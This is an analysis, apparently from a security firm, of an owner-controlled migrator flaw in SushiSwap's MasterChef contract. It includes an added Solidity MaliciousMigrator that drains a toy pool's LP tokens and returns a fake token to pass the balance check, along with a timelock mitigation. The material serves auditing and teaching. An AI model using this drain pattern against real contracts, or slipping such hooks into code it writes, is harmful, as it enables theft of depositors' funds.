
First release | Sushiswap smart contract security vulnerability event analysis


On August 28, Beijing time, the CertiK security research team found multiple security vulnerabilities in the smart contract of the sushiswap project. The contract's owner is able to perform arbitrary operations, including draining the tokens deposited in it. The contract also contains a serious reentrancy vulnerability that would allow a potential attacker's malicious code to be executed multiple times.

Technical details:


(Figure: MasterChef.sol, line 131) https://github.com/sushiswap/sushiswap/blob/master/contracts/MasterChef.sol


At line 131 of MasterChef.sol (shown in the figure above), the contract owner alone has the authority to set the migrator variable, and the address stored there determines which contract's migrate code is executed in the operation that follows.


(Figure: MasterChef.sol, line 136) https://github.com/sushiswap/sushiswap/blob/master/contracts/MasterChef.sol

Once migrator has been set, the call at line 142 in the figure above, migrator.migrate(lpToken), resolves to whatever contract that variable points to. Because the call is made through the IMigratorChef interface, the logic that actually runs inside migrate is whatever code lives at the migrator address; nothing in MasterChef itself constrains it.

In short, if the contract owner points migrator at a contract whose migrate method is malicious, the owner can perform whatever operation they want, including draining all of the LP tokens held by the MasterChef contract.

In addition, because migrator.migrate(lpToken) at line 142 is an external call into owner-chosen code, a malicious migrator can re-enter the MasterChef contract while that call is still in progress, invoking migrate (line 136) again or any other contract method to carry out further malicious operations.
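The following is an added illustration, not SushiSwap's code, of the pattern described above: a minimal pool whose owner can point migrator at any contract, and a malicious migrator that drains the pool through the allowance it is handed. Contract and variable names (OwnerSettableMigratorPool, FakeLP, MaliciousMigrator) are assumptions made for the example. The balance check after the external call mirrors the one in the linked MasterChef.sol; the example shows why it does not constrain a hostile migrator, since the check asks the token the migrator itself returned.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example (not SushiSwap's code). Names are assumptions.
interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function approve(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
}

interface IMigrator {
    function migrate(IERC20 token) external returns (IERC20);
}

contract OwnerSettableMigratorPool {
    address public owner;
    IMigrator public migrator;
    IERC20 public lpToken;

    constructor(IERC20 _lpToken) {
        owner = msg.sender;
        lpToken = _lpToken;
    }

    // No delay and no vote: a single owner key decides which code runs in migrate().
    function setMigrator(IMigrator _migrator) external {
        require(msg.sender == owner, "not owner");
        migrator = _migrator;
    }

    function migrate() external {
        require(address(migrator) != address(0), "no migrator");
        uint256 bal = lpToken.balanceOf(address(this));
        // The pool grants the migrator an allowance for its entire LP balance...
        lpToken.approve(address(migrator), bal);
        // ...and then executes whatever code lives at `migrator`. This external
        // call is also the point at which the migrator may call back into the pool.
        IERC20 newLpToken = migrator.migrate(lpToken);
        // The post-condition only asks the *returned* token for the balance, so a
        // migrator that returns a token it controls passes trivially.
        require(bal == newLpToken.balanceOf(address(this)), "migrate: bad");
        lpToken = newLpToken;
    }
}

// A token that reports whatever balance the attacker tells it to.
contract FakeLP is IERC20 {
    uint256 private claimed;

    function setClaimed(uint256 amount) external { claimed = amount; }
    function balanceOf(address) external view override returns (uint256) { return claimed; }
    function approve(address, uint256) external pure override returns (bool) { return true; }
    function transferFrom(address, address, uint256) external pure override returns (bool) { return true; }
}

// Malicious migrator: pulls the real LP tokens out using the allowance the pool
// just granted, then returns a FakeLP whose balanceOf satisfies the pool's check.
contract MaliciousMigrator is IMigrator {
    address public immutable attacker;

    constructor() { attacker = msg.sender; }

    function migrate(IERC20 token) external override returns (IERC20) {
        // msg.sender is the pool, which approved this contract for its full balance.
        uint256 bal = token.balanceOf(msg.sender);
        require(token.transferFrom(msg.sender, attacker, bal), "pull failed");
        FakeLP fake = new FakeLP();
        fake.setClaimed(bal);
        return fake;
    }
}
```

Attack sequence under these assumptions: the attacker deploys MaliciousMigrator, the owner (or an attacker holding the owner key) calls setMigrator with its address, and anyone then calls migrate(); the real LP tokens leave the pool in that one transaction and the pool is left pointing at FakeLP. The lesson for reviewers is that an owner-settable external call with an approval in front of it is equivalent to full owner custody of the funds, whatever post-conditions follow the call.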

The creator of the sushiswap project has stated that the project has since been placed behind a timelock contract, so that any operation by the smart contract owner is subject to a 48-hour delay.
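As an added example of the mitigation just described, not the project's own timelock contract, the snippet below gates only the migrator setter behind a fixed delay: the owner must announce the new migrator on-chain and can make it effective only after the waiting period, during which depositors can inspect the proposed contract and withdraw. The names (DelayedMigratorSetter, MIGRATOR_DELAY, pendingMigrator, pendingMigratorEta) are assumptions; the 48-hour value matches the delay stated above.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example (not SushiSwap's code). Names are assumptions.
contract DelayedMigratorSetter {
    // Declared constant so the owner cannot shorten the delay itself.
    uint256 public constant MIGRATOR_DELAY = 48 hours;

    address public owner;
    address public migrator;

    address public pendingMigrator;
    // Earliest block.timestamp at which pendingMigrator may take effect.
    uint256 public pendingMigratorEta;

    event MigratorProposed(address indexed migrator, uint256 eta);
    event MigratorSet(address indexed migrator);
    event MigratorCancelled(address indexed migrator);

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    constructor() { owner = msg.sender; }

    // Step 1: announce the change. Nothing takes effect yet, and the emitted
    // event is what watchers and depositors react to.
    function proposeMigrator(address _migrator) external onlyOwner {
        require(_migrator != address(0), "zero migrator");
        // Re-proposing overwrites the pending entry and restarts the clock.
        pendingMigrator = _migrator;
        pendingMigratorEta = block.timestamp + MIGRATOR_DELAY;
        emit MigratorProposed(_migrator, pendingMigratorEta);
    }

    // Step 2: only after the full delay has elapsed can the change land.
    function executeMigrator() external onlyOwner {
        require(pendingMigrator != address(0), "nothing pending");
        require(block.timestamp >= pendingMigratorEta, "delay not elapsed");
        migrator = pendingMigrator;
        emit MigratorSet(migrator);
        delete pendingMigrator;
        delete pendingMigratorEta;
    }

    // A proposal the community rejects during the waiting period can be withdrawn.
    function cancelMigrator() external onlyOwner {
        emit MigratorCancelled(pendingMigrator);
        delete pendingMigrator;
        delete pendingMigratorEta;
    }
}
```

Two caveats for anyone adopting this pattern: the delay only protects depositors if withdrawal does not depend on the owner, so they can actually leave before the ETA; and a delay on one setter is weaker than the approach the project describes, where the entire owner role sits behind a timelock contract and every privileged call, not just this one, waits out the 48 hours.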

Lessons from this vulnerability:

Smart contract owners should not have unlimited rights; community governance must limit the owner's powers and ensure that the owner cannot use that privileged position to carry out malicious operations;

Smart contract code must undergo strict security verification and auditing before it is released.
